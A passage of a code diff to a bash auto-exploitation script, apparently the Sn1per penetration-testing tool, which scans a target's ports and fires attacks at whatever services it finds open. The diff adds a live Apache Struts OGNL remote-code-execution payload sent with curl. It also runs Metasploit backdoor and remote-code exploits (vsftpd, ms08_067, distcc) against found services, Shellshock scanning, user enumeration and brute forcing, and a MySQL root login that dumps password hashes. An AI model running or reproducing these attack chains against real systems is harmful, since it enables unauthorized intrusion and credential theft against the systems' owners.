sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[m|K]//g" $a >> $LOOT_DIR/reports/$a
# HTML OUTPUT
echo "$a" | aha --black > $LOOT_DIR/reports/$a.html
cat "$a" | aha --black >> $LOOT_DIR/reports/$a.html
# TEXT OUTPUT DISABLED
#echo "$a" | aha --black > $LOOT_DIR/reports/$a
#sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[m|K]//g" $a >> $LOOT_DIR/reports/$a
# CONSOLE OUTPUT
mv $a $LOOT_DIR/output/
done
echo -e "$OKORANGE + -- --=[Removing blank web screenshots...$RESET"
@@ -108,8 +178,8 @@ function loot {
cp -Rf $LOOT_DIR/imports/ $LOOT_DIR/workspace/$WORKSPACE/ 2> /dev/null
cp -Rf $LOOT_DIR/notes/ $LOOT_DIR/workspace/$WORKSPACE/ 2> /dev/null
cp -Rf $LOOT_DIR/web/ $LOOT_DIR/workspace/$WORKSPACE/ 2> /dev/null
rm -Rf $LOOT_DIR/{screenshots,nmap,domains,outputs,reports,imports,notes,web}/ 2> /dev/null
mkdir $LOOT_DIR/{screenshots,nmap,domains,outputs,reports,imports,notes,web}/ -p 2> /dev/null
rm -Rf $LOOT_DIR/{screenshots,nmap,domains,output,reports,imports,notes,web}/ 2> /dev/null
mkdir $LOOT_DIR/{screenshots,nmap,domains,output,reports,imports,notes,web}/ -p 2> /dev/null
echo -e "$OKORANGE + -- --=[Opening workspace directory...$RESET"
iceweasel 2> /dev/null &
sleep 2
@@ -187,6 +257,9 @@ else
SCAN_TYPE="DOMAIN"
fi
# INITILIZE()
init
if [ "$MODE" = "report" ]; then
sniper $TARGET | tee $LOOT_DIR/sniper-$TARGET-`date +%Y%m%d%H%M`.txt 2>&1
exit
@@ -214,23 +287,29 @@ if [ "$MODE" = "discover" ]; then
echo -e "$OKRED \/$RESET"
echo ""
echo -e "$OKGREEN + -- ----------------------------=[Running Ping Discovery Scan]=------------- -- +$RESET"
nmap -sP $TARGET
nmap -sP $TARGET | grep ' for ' | awk '{print $5}' | tee $LOOT_DIR/domains/sniper-ping-ips.txt
echo -e "$OKGREEN + -- ----------------------------=[Checking ARP Cache]=---------------------- -- +$RESET"
arp -a -n
echo -e "$OKGREEN + -- ----------------------------=[Running Port Discovery Scan]=------------- -- +$RESET"
unicornscan $TARGET -p $DEFAULT_PORTS 2>/dev/null | awk '{print $6}' | sort -u > $LOOT_DIR/domains/sniper-ips.txt
arp -a -n | tee $LOOT_DIR/domains/sniper-arp-ips.txt
echo -e "$OKGREEN + -- ----------------------------=[Running TCP Port Discovery Scan]=--------- -- +$RESET"
unicornscan -p $DEFAULT_TCP_PORTS $TARGET 2>/dev/null | tee $LOOT_DIR/domains/sniper-tcp-ports.txt
cat $LOOT_DIR/domains/sniper-tcp-ports.txt | awk '{print $6}' | sort -u | tee $LOOT_DIR/domains/sniper-tcp-ips.txt
echo -e "$OKGREEN + -- ----------------------------=[Running UDP Port Discovery Scan]=--------- -- +$RESET"
unicornscan -m U -p $DEFAULT_UDP_PORTS $TARGET 2>/dev/null | tee $LOOT_DIR/domains/sniper-udp-ports.txt
cat $LOOT_DIR/domains/sniper-udp-ports.txt | awk '{print $6}' | sort -u > $LOOT_DIR/domains/sniper-udp-ips.txt
echo -e "$OKGREEN + -- ----------------------------=[Current Targets]=------------------------- -- +$RESET"
cat $LOOT_DIR/domains/sniper-ping-ips.txt $LOOT_DIR/domains/sniper-tcp-ips.txt $LOOT_DIR/domains/sniper-udp-ips.txt > $LOOT_DIR/domains/sniper-ips-unsorted.txt
sort -u $LOOT_DIR/domains/sniper-ips-unsorted.txt > $LOOT_DIR/domains/sniper-ips.txt
cat $LOOT_DIR/domains/sniper-ips.txt
echo -e "$OKGREEN + -- ----------------------------=[Launching Sn1per Scans]=------------------ -- +$RESET"
echo ""
if [ "$OPT1" = "report" ]; then
for a in `cat $LOOT_DIR/domains/sniper-ips.txt`
do sniper $a stealth report
do sniper $a report
done
exit
fi
for a in `cat $LOOT_DIR/domains/sniper-ips.txt`
do sniper $a stealth
do sniper $a
done
exit
fi
@@ -324,7 +403,7 @@ if [ "$MODE" = "stealth" ]; then
fi
echo ""
echo -e "$OKGREEN + -- ----------------------------=[Running TCP port scan]=------------------- -- +$RESET"
nmap -sS -T5 --open -p $DEFAULT_PORTS $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml
nmap -sS -T5 --open -Pn -p $DEFAULT_PORTS $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml
port_80=`grep 'portid="80"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
port_443=`grep 'portid="443"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
@@ -469,7 +548,7 @@ if [ "$MODE" = "airstrike" ]; then
fi
echo ""
echo -e "$OKGREEN + -- ----------------------------=[Running port scan]=------------------- -- +$RESET"
nmap -sS -T5 --open -p $DEFAULT_PORTS $a -oX $LOOT_DIR/nmap/nmap-$a.xml
nmap -sS -T5 --open -Pn -p $DEFAULT_PORTS $a -oX $LOOT_DIR/nmap/nmap-$a.xml
port_80=`grep 'portid="80"' $LOOT_DIR/nmap/nmap-$a.xml | grep open`
port_443=`grep 'portid="443"' $LOOT_DIR/nmap/nmap-$a.xml | grep open`
@@ -537,9 +616,13 @@ if [ "$MODE" = "fullportonly" ]; then
echo -e "$RESET"
echo -e "$OKGREEN + -- ----------------------------=[Performing Port Scan]=------------------- -- +$RESET"
if [ -z "$OPT1" ]; then
nmap -T4 -sV -O -v -p 1-65535 $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml
nmap -T4 -sV -O -v -p 1-65355 --script=* -Pn $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml
echo -e "$OKGREEN + -- ----------------------------=[Enumerating Exploits]=------------------- -- +$RESET"
searchsploit --nmap $LOOT_DIR/nmap/nmap-$TARGET.xml
else
nmap -T4 -sV -O -v -p $OPT1 $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml
nmap -T4 -sV -O -v -p $OPT1 --script=* -Pn $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml
echo -e "$OKGREEN + -- ----------------------------=[Enumerating Exploits]=------------------- -- +$RESET"
searchsploit --nmap $LOOT_DIR/nmap/nmap-$TARGET.xml
fi
echo -e "$OKGREEN + -- ----------------------------=[Done]=------------------------------------ -- +$RESET"
exit
@@ -645,13 +728,13 @@ ping -c 1 $TARGET
echo ""
echo -e "$OKGREEN + -- ----------------------------=[Running TCP port scan]=------------------- -- +$RESET"
if [ -z "$OPT1" ]; then
nmap -sS -T5 --open -p $DEFAULT_PORTS $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml
nmap -sS -T5 --open -Pn -p $DEFAULT_PORTS $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml
elif [ "$OPT1" == "web" ]; then
nmap -sV -T5 -p 80,443 --open $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml
nmap -sV -T5 -Pn -p 80,443 --open $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml
else
nmap -sS -T5 -p $OPT1 --open $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml
nmap -sS -T5 -Pn -p $OPT1 --open $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml
echo -e "$OKGREEN + -- ----------------------------=[Running UDP port scan]=------------------- -- +$RESET"
nmap -sU -T5 -p U:$OPT1 --open $TARGET
nmap -sU -T5 -Pn -p U:$OPT1 --open $TARGET
fi
if [ -z $DISABLE_POSTGRESQL ]; then service postgresql start; fi
@@ -677,6 +760,8 @@ port_445=`grep 'portid="445"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
port_512=`grep 'portid="512"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
port_513=`grep 'portid="513"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
port_514=`grep 'portid="514"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
port_623=`grep 'portid="623"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
port_624=`grep 'portid="624"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
port_1099=`grep 'portid="1099"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
port_1433=`grep 'portid="1433"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
port_1524=`grep 'portid="1524"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
@@ -700,6 +785,7 @@ port_8180=`grep 'portid="8180"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
port_8443=`grep 'portid="8443"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
port_8888=`grep 'portid="8888"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
port_10000=`grep 'portid="10000"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
port_16992=`grep 'portid="16992"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
port_27017=`grep 'portid="27017"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
port_27018=`grep 'portid="27018"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
port_27019=`grep 'portid="27019"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
@@ -711,7 +797,7 @@ then
echo -e "$OKRED + -- --=[Port 21 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 21 opened... running tests...$RESET"
nmap -A -sV -sC -T5 -p 21 --script=ftp-* $TARGET
nmap -A -sV -Pn -sC -T5 -p 21 --script=ftp-* $TARGET
msfconsole -x "use exploit/unix/ftp/vsftpd_234_backdoor; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; run; use unix/ftp/proftpd_133c_backdoor; run; exit;"
fi
@@ -723,7 +809,7 @@ else
cd $PLUGINS_DIR/ssh-audit
python ssh-audit.py $TARGET:22
cd $INSTALL_DIR
nmap -A -sV -sC -T5 -p 22 --script=ssh-* $TARGET
nmap -A -sV -Pn -sC -T5 -p 22 --script=ssh-* $TARGET
msfconsole -x "use scanner/ssh/ssh_enumusers; setg USER_FILE "$USER_FILE"; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; use scanner/ssh/ssh_identify_pubkeys; run; use scanner/ssh/ssh_version; run; exit;"
fi
@@ -734,7 +820,7 @@ else
echo -e "$OKORANGE + -- --=[Port 23 opened... running tests...$RESET"
echo ""
cisco-torch -A $TARGET
nmap -A -sV -T5 --script=telnet* -p 23 $TARGET
nmap -A -sV -Pn -T5 --script=telnet* -p 23 $TARGET
msfconsole -x "use scanner/telnet/lantronix_telnet_password; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; use scanner/telnet/lantronix_telnet_version; run; use scanner/telnet/telnet_encrypt_overflow; run; use scanner/telnet/telnet_ruggedcom; run; use scanner/telnet/telnet_version; run; exit;"
fi
@@ -743,7 +829,7 @@ then
echo -e "$OKRED + -- --=[Port 25 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 25 opened... running tests...$RESET"
nmap -A -sV -T5 --script=smtp* -p 25 $TARGET
nmap -A -sV -Pn -T5 --script=smtp* -p 25 $TARGET
smtp-user-enum -M VRFY -U $USER_FILE -t $TARGET
msfconsole -x "use scanner/smtp/smtp_enum; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; exit;"
fi
@@ -753,7 +839,7 @@ then
echo -e "$OKRED + -- --=[Port 53 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 53 opened... running tests...$RESET"
nmap -A -sU -sV -T5 --script=dns* -p U:53,T:53 $TARGET
nmap -A -sU -sV -Pn -T5 --script=dns* -p U:53,T:53 $TARGET
fi
if [ -z "$port_79" ];
@@ -761,7 +847,7 @@ then
echo -e "$OKRED + -- --=[Port 79 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 79 opened... running tests...$RESET"
nmap -A -sV -T5 --script=finger* -p 79 $TARGET
nmap -A -sV -Pn -T5 --script=finger* -p 79 $TARGET
bin/fingertool.sh $TARGET $USER_FILE
fi
@@ -831,14 +917,14 @@ else
echo -e "$OKGREEN + -- ----------------------------=[Running Web Vulnerability Scan]=---------- -- +$RESET"
nikto -h http://$TARGET
echo -e "$OKGREEN + -- ----------------------------=[Saving Web Screenshots]=------------------ -- +$RESET"
echo -e "$OKRED[+]$RESET ;/Screenshot saved to $LOOT_DIR/screenshots/$TARGET-port80.jpg"
echo -e "$OKRED[+]$RESET Screenshot saved to $LOOT_DIR/screenshots/$TARGET-port80.jpg"
cutycapt --url=http://$TARGET --out=$LOOT_DIR/screenshots/$TARGET-port80.jpg
if [ "$MODE" = "web" ];
then
echo -e "$OKGREEN + -- ----------------------------=[Saving Web Screenshots]=------------------ -- +$RESET"
echo -e "$OKGREEN + -- ----------------------------=[Running NMap HTTP Scripts]=--------------- -- +$RESET"
nmap -A -sV -T5 -p 80 --script=http-enum,http-headers,http-server-header,http-php-version,http-iis-webdav-vuln,http-vuln-*,http-phpmyadmin-dir-traversal $TARGET
nmap -A -Pn -T5 -p 80 -sV --script=/usr/share/nmap/scripts/http-vuln-cve2017-5638.nse --script=/usr/share/nmap/scripts/iis-buffer-overflow.nse --script=http-enum,http-headers,http-server-header,http-php-version,http-iis-webdav-vuln,http-vuln-*,http-phpmyadmin-dir-traversal $TARGET
echo -e "$OKGREEN + -- ----------------------------=[Running Directory Brute Force]=----------- -- +$RESET"
dirb http://$TARGET
echo -e "$OKGREEN + -- ----------------------------=[Running Wordpress Vulnerability Scans]=--- -- +$RESET"
@@ -864,12 +950,18 @@ else
msfconsole -x "use exploit/multi/http/phpmyadmin_3522_backdoor; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; use exploit/unix/webapp/phpmyadmin_config; run; use multi/http/phpmyadmin_preg_replace; run; exit;"
echo -e "$OKGREEN + -- ----------------------------=[Running ShellShock Auto-Scan Exploit]=---- -- +$RESET"
python $PLUGINS_DIR/shocker/shocker.py -H $TARGET --cgilist $PLUGINS_DIR/shocker/shocker-cgi_list --port 80
echo -e "$OKGREEN + -- ----------------------------=[Running Apache Jakarta RCE Exploit]=------ -- +$RESET"
curl -s -H "Content-Type: %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}" http://$TARGET | head -n 1
fi
if [ $SCAN_TYPE == "DOMAIN" ];
then
echo -e "$OKGREEN + -- ----------------------------=[Running Google Hacking Queries]=--------- -- +$RESET"
goohak $TARGET > /dev/null
if [ "$GOOHAK" = "0" ]; then
echo -e "$OKGREEN + -- ----------------------------=[Skipping Google Hacking Queries]=-------------------- -- +$RESET"
else
echo -e "$OKGREEN + -- ----------------------------=[Running Google Hacking Queries]=--------------------- -- +$RESET"
goohak $TARGET > /dev/null
fi
echo -e "$OKGREEN + -- ----------------------------=[Running InUrlBR OSINT Queries]=---------- -- +$RESET"
php $INURLBR --dork "site:$TARGET" -s inurlbr-$TARGET.txt
rm -Rf output/ cookie.txt exploits.conf
@@ -882,7 +974,7 @@ then
echo -e "$OKRED + -- --=[Port 110 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 110 opened... running tests...$RESET"
nmap -A -sV -T5 --script=pop* -p 110 $TARGET
nmap -A -sV -T5 --script=pop* -p 110 $TARGET
fi
if [ -z "$port_111" ];
@@ -914,7 +1006,7 @@ else
enum4linux $TARGET
python $SAMRDUMP $TARGET
nbtscan $TARGET
nmap -A -sV -T5 -p139 --script=smb-server-stats --script=smb-ls --script=smb-enum-domains --script=smbv2-enabled --script=smb-psexec --script=smb-enum-groups --script=smb-enum-processes --script=smb-brute --script=smb-print-text --script=smb-security-mode --script=smb-os-discovery --script=smb-enum-sessions --script=smb-mbenum --script=smb-enum-users --script=smb-enum-shares --script=smb-system-info --script=smb-vuln-ms10-054 --script=smb-vuln-ms10-061 $TARGET
nmap -A -sV -T5 -p139 --script=smb-server-stats --script=smb-ls --script=smb-enum-domains --script=smbv2-enabled --script=smb-psexec --script=smb-enum-groups --script=smb-enum-processes --script=smb-brute --script=smb-print-text --script=smb-security-mode --script=smb-os-discovery --script=smb-enum-sessions --script=smb-mbenum --script=smb-enum-users --script=smb-enum-shares --script=smb-system-info --script=smb-vuln-ms10-054 --script=smb-vuln-ms10-061 $TARGET
msfconsole -x "use auxiliary/scanner/smb/pipe_auditor; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; use auxiliary/scanner/smb/pipe_dcerpc_auditor; run; use auxiliary/scanner/smb/psexec_loggedin_users; run; use auxiliary/scanner/smb/smb2; run; use auxiliary/scanner/smb/smb_enum_gpp; run; use auxiliary/scanner/smb/smb_enumshares; run; use auxiliary/scanner/smb/smb_enumusers; run; use auxiliary/scanner/smb/smb_enumusers_domain; run; use auxiliary/scanner/smb/smb_login; run; use auxiliary/scanner/smb/smb_lookupsid; run; use auxiliary/scanner/smb/smb_uninit_cred; run; use auxiliary/scanner/smb/smb_version; run; use exploit/linux/samba/chain_reply; run; use windows/smb/ms08_067_netapi; run; exit;"
fi
@@ -933,7 +1025,7 @@ then
else
echo -e "$OKORANGE + -- --=[Port 162 opened... running tests...$RESET"
for a in `cat /usr/share/brutex/wordlists/snmp-strings.txt`; do snmpwalk $TARGET -c $a; done;
nmap -A -p 162 --script=snmp* $TARGET
nmap -A -p 162 -Pn --script=snmp* $TARGET
fi
if [ -z "$port_389" ];
@@ -941,7 +1033,7 @@ then
echo -e "$OKRED + -- --=[Port 389 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 389 opened... running tests...$RESET"
nmap -A -p 389 -T5 --script=ldap* $TARGET
nmap -A -p 389 -Pn -T5 --script=ldap* $TARGET
fi
if [ -z "$port_443" ];
@@ -1023,7 +1115,7 @@ else
if [ "$MODE" = "web" ];
then
echo -e "$OKGREEN + -- ----------------------------=[Running NMap HTTP Scripts]=--------------- -- +$RESET"
nmap -A -sV -T5 -p 443 --script=http-enum,http-headers,http-server-header,http-php-version,http-iis-webdav-vuln,http-vuln-*,http-phpmyadmin-dir-traversal $TARGET
nmap -A -sV -T5 -Pn -p 443 --script=/usr/share/nmap/scripts/http-vuln-cve2017-5638.nse --script=/usr/share/nmap/scripts/iis-buffer-overflow.nse --script=http-enum,http-headers,http-server-header,http-php-version,http-iis-webdav-vuln,http-vuln-*,http-phpmyadmin-dir-traversal $TARGET
echo -e "$OKGREEN + -- ----------------------------=[Running Directory Brute Force]=----------- -- +$RESET"
dirb https://$TARGET
echo -e "$OKGREEN + -- ----------------------------=[Running Wordpress Vulnerability Scans]=--- -- +$RESET"
@@ -1053,14 +1145,20 @@ else
msfconsole -x "use exploit/multi/http/phpmyadmin_3522_backdoor; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; setg RPORT 443; run; use exploit/unix/webapp/phpmyadmin_config; run; use multi/http/phpmyadmin_preg_replace; run; exit;"
echo -e "$OKGREEN + -- ----------------------------=[Running ShellShock Auto-Scan Exploit]=---- -- +$RESET"
python $PLUGINS_DIR/shocker/shocker.py -H $TARGET --cgilist $PLUGINS_DIR/shocker/shocker-cgi_list --port 443 --ssl
echo -e "$OKGREEN + -- ----------------------------=[Running Apache Jakarta RCE Exploit]=------ -- +$RESET"
curl -s -H "Content-Type: %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}" https://$TARGET | head -n 1
fi
if [ $SCAN_TYPE == "DOMAIN" ];
then
if [ -z $GHDB ];
then
echo -e "$OKGREEN + -- ----------------------------=[Running Google Hacking Queries]=---------- -- +$RESET"
goohak $TARGET > /dev/null
if [ "$GOOHAK" = "0" ]; then
echo -e "$OKGREEN + -- ----------------------------=[Skipping Google Hacking Queries]=-------------------- -- +$RESET"
else
echo -e "$OKGREEN + -- ----------------------------=[Running Google Hacking Queries]=--------------------- -- +$RESET"
goohak $TARGET > /dev/null
fi
echo -e "$OKGREEN + -- ----------------------------=[Running InUrlBR OSINT Queries]=----------- -- +$RESET"
php $INURLBR --dork "site:$TARGET" -s inurlbr-$TARGET.txt
rm -Rf output/ cookie.txt exploits.conf
@@ -1079,7 +1177,7 @@ else
enum4linux $TARGET
python $SAMRDUMP $TARGET
nbtscan $TARGET
nmap -A -sV -T5 -p445 --script=smb-server-stats --script=smb-ls --script=smb-enum-domains --script=smbv2-enabled --script=smb-psexec --script=smb-enum-groups --script=smb-enum-processes --script=smb-brute --script=smb-print-text --script=smb-security-mode --script=smb-os-discovery --script=smb-enum-sessions --script=smb-mbenum --script=smb-enum-users --script=smb-enum-shares --script=smb-system-info --script=smb-vuln-ms10-054 --script=smb-vuln-ms10-061 $TARGET
nmap -A -sV -Pn -T5 -p445 --script=smb-server-stats --script=smb-ls --script=smb-enum-domains --script=smbv2-enabled --script=smb-psexec --script=smb-enum-groups --script=smb-enum-processes --script=smb-brute --script=smb-print-text --script=smb-security-mode --script=smb-os-discovery --script=smb-enum-sessions --script=smb-mbenum --script=smb-enum-users --script=smb-enum-shares --script=smb-system-info --script=smb-vuln-ms10-054 --script=smb-vuln-ms10-061 $TARGET
msfconsole -x "use auxiliary/scanner/smb/pipe_auditor; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; use auxiliary/scanner/smb/pipe_dcerpc_auditor; run; use auxiliary/scanner/smb/psexec_loggedin_users; run; use auxiliary/scanner/smb/smb2; run; use auxiliary/scanner/smb/smb_enum_gpp; run; use auxiliary/scanner/smb/smb_enumshares; run; use auxiliary/scanner/smb/smb_enumusers; run; use auxiliary/scanner/smb/smb_enumusers_domain; run; use auxiliary/scanner/smb/smb_login; run; use auxiliary/scanner/smb/smb_lookupsid; run; use auxiliary/scanner/smb/smb_uninit_cred; run; use auxiliary/scanner/smb/smb_version; run; use exploit/linux/samba/chain_reply; run; use windows/smb/ms08_067_netapi; run; exit;"
fi
@@ -1088,7 +1186,7 @@ then
echo -e "$OKRED + -- --=[Port 512 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 512 opened... running tests...$RESET"
nmap -A -sV -T5 -p 512 --script=rexec* $TARGET
nmap -A -sV -Pn -T5 -p 512 --script=rexec* $TARGET
fi
if [ -z "$port_513" ]
@@ -1096,7 +1194,7 @@ then
echo -e "$OKRED + -- --=[Port 513 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 513 opened... running tests...$RESET"
nmap -A -sV -T5 -p 513 --script=rlogin* $TARGET
nmap -A -sV -T5 -Pn -p 513 --script=rlogin* $TARGET
fi
if [ -z "$port_514" ];
@@ -1107,12 +1205,41 @@ else
amap $TARGET 514 -A
fi
if [ -z "$port_623" ];
then
echo -e "$OKRED + -- --=[Port 623 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 623 opened... running tests...$RESET"
amap $TARGET 623 -A
nmap -A -sV -Pn -T5 --script=/usr/share/nmap/scripts/http-vuln-INTEL-SA-00075.nse -p 623 $TARGET
fi
if [ -z "$port_624" ];
then
echo -e "$OKRED + -- --=[Port 624 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 624 opened... running tests...$RESET"
amap $TARGET 624 -A
nmap -A -sV -Pn -T5 --script=/usr/share/nmap/scripts/http-vuln-INTEL-SA-00075.nse -p 624 $TARGET
fi
if [ -z "$port_1099" ];
then
echo -e "$OKRED + -- --=[Port 1099 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 1099 opened... running tests...$RESET"
amap $TARGET 1099 -A
nmap -A -sV -Pn -T5 -p 1099 --script=rmi-* $TARGET
msfconsole -x "use gather/java_rmi_registry; set RHOST "$TARGET"; run;"
msfconsole -x "use scanner/misc/java_rmi_server; set RHOST "$TARGET"; run;"
fi
if [ -z "$port_1433" ];
then
echo -e "$OKRED + -- --=[Port 1433 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 1433 opened... running tests...$RESET"
nmap -A -sV -T5 --script=mssql* -p 1433 $TARGET
nmap -A -sV -Pn -T5 --script=ms-sql* -p 1433 $TARGET
fi
if [ -z "$port_2049" ];
@@ -1120,7 +1247,7 @@ then
echo -e "$OKRED + -- --=[Port 2049 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 2049 opened... running tests...$RESET"
nmap -A -sV -T5 --script=nfs* -p 2049 $TARGET
nmap -A -sV -Pn -T5 --script=nfs* -p 2049 $TARGET
rpcinfo -p $TARGET
showmount -e $TARGET
smbclient -L $TARGET -U " "%" "
@@ -1131,7 +1258,7 @@ then
echo -e "$OKRED + -- --=[Port 2121 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 2121 opened... running tests...$RESET"
nmap -A -sV -T5 --script=ftp* -p 2121 $TARGET
nmap -A -sV -Pn -T5 --script=ftp* -p 2121 $TARGET
msfconsole -x "setg PORT 2121; use exploit/unix/ftp/vsftpd_234_backdoor; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; use unix/ftp/proftpd_133c_backdoor; run; exit;"
fi
@@ -1140,7 +1267,7 @@ then
echo -e "$OKRED + -- --=[Port 3306 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 3306 opened... running tests...$RESET"
nmap -A -sV --script=mysql* -p 3306 $TARGET
nmap -A -sV -Pn --script=mysql* -p 3306 $TARGET
mysql -u root -h $TARGET -e 'SHOW DATABASES; SELECT Host,User,Password FROM mysql.user;'
fi
@@ -1149,7 +1276,7 @@ then
echo -e "$OKRED + -- --=[Port 3310 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 3310 opened... running tests...$RESET"
nmap -A -p 3310 -T5 -sV --script clamav-exec $TARGET
nmap -A -p 3310 -Pn -T5 -sV --script clamav-exec $TARGET
fi
if [ -z "$port_3128" ];
@@ -1157,7 +1284,7 @@ then
echo -e "$OKRED + -- --=[Port 3128 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 3128 opened... running tests...$RESET"
nmap -A -p 3128 -T5 -sV --script=*proxy* $TARGET
nmap -A -p 3128 -Pn -T5 -sV --script=*proxy* $TARGET
fi
if [ -z "$port_3389" ];
@@ -1165,7 +1292,7 @@ then
echo -e "$OKRED + -- --=[Port 3389 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 3389 opened... running tests...$RESET"
nmap -A -sV -T5 --script=rdp-* -p 3389 $TARGET
nmap -A -sV -Pn -T5 --script=rdp-* -p 3389 $TARGET
rdesktop $TARGET &
fi
@@ -1174,7 +1301,7 @@ then
echo -e "$OKRED + -- --=[Port 3632 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 3632 opened... running tests...$RESET"
nmap -A -sV -T5 --script=distcc-* -p 3632 $TARGET
nmap -A -sV -Pn -T5 --script=distcc-* -p 3632 $TARGET
msfconsole -x "setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; use unix/misc/distcc_exec; run; exit;"
fi
@@ -1195,7 +1322,7 @@ else
cd $INSTALL_DIR
nikto -h https://$TARGET:4443
cutycapt --url=https://$TARGET:4443 --out=$LOOT_DIR/screenshots/$TARGET-port4443.jpg
nmap -A -p 4443 -T5 --script=*proxy* $TARGET
nmap -sV -Pn -A -p 4443 -T5 --script=*proxy* $TARGET
fi
if [ -z "$port_5432" ];
@@ -1203,7 +1330,7 @@ then
echo -e "$OKRED + -- --=[Port 5432 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 5432 opened... running tests...$RESET"
nmap -A -sV --script=pgsql-brute -p 5432 $TARGET
nmap -A -sV -Pn --script=pgsql-brute -p 5432 $TARGET
fi
if [ -z "$port_5800" ];
@@ -1211,7 +1338,7 @@ then
echo -e "$OKRED + -- --=[Port 5800 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 5800 opened... running tests...$RESET"
nmap -A -sV -T5 --script=vnc* -p 5800 $TARGET
nmap -A -sV -Pn -T5 --script=vnc* -p 5800 $TARGET
fi
if [ -z "$port_5900" ];
@@ -1219,7 +1346,7 @@ then
echo -e "$OKRED + -- --=[Port 5900 closed... skipping.$RESET"
